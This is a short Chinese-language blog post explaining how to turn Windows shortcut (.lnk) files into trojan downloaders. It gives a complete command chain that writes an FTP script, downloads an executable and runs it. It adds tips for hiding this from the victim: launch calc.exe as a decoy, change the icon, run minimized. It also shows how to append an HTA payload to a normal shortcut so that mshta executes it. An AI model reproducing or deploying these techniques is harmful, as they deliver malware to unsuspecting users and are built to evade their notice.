Windows快捷方式綁馬

0x01前言

windows的shell32在處理控制台程式的快捷方式檔案時，存在一個漏洞，可以加載硬碟上的任意DLL檔案，即可執行任意代碼。

之前看到一款俄羅斯黑闊寫的的快捷方式下載下傳木馬并運作的生成工具（Shortcut Downloader），調用PowerShell建立快捷方式實作下載下傳惡意檔案并運作。

位址:https://github.com/codecrack3/Shortcut-Downloader
           

0x02 實作

方法一:lnk裡直接加指令

基本思路

邏輯

1. Echo寫出ftp資訊，使用ftp –s:x 參數運作下載下傳指令

2. 語句使用&&連結，語句被執行才會繼續下一步操作

3. 最後執行惡意程式時使用if exist判斷惡意程式是否下載下傳，如果下載下傳則執行

echo open127.0.0.1>f&&echo 123>>f&&echo 321>>f&&echo get 2.exe>>f&&echo bye>>f&&ftp -s:f&&del /q f&&if exist 2.exe start2.exe
           

這裡注意區這裡 “>” 和 “>>” ，第一個是重定向(會覆寫原内容)，第二個是向檔案内追加内容

ftp指令中的-s參數是指定包含 FTP 指令的文本檔案；

CMD下運作正常，但寫到快捷方式，顯然需要修改一下，首先必須加入/c執行，否則會卡出黑屏不退出，在下載下傳前運作一個正常的程式，免的被發現，例如calc.exe&&下載下傳運作指令，最好更改下圖示增加迷惑性，其次既然是在背景靜默下載下傳運作，我們當然不想快捷方式一閃而過，建立完快捷方式右鍵修改運作方式最小化，OK一個簡單lnk下載下傳者就成了。

建立快捷方式

選擇快捷方式的exe先随便選一個

修改運作方式，最小化。

方法二:

lnk檔案後面接上html腳本，html裡面包含2進制資料，用mshta就可以随便執行2進制了

比如這裡1.hta裡面是我們需要執行的木馬二進制，hacker.lnk是個正常的快捷方式

利用cmd的copy指令生成一個新的惡意快捷方式

copy /b hacker.lnk+1.hta my.lnk

 
           

運作這個lnk。lnk把自己複制成hta運作,執行了惡意二進制檔案

posted @ 2019-04-14 22:12 卿先生 閱讀(...) 評論(...) 編輯 收藏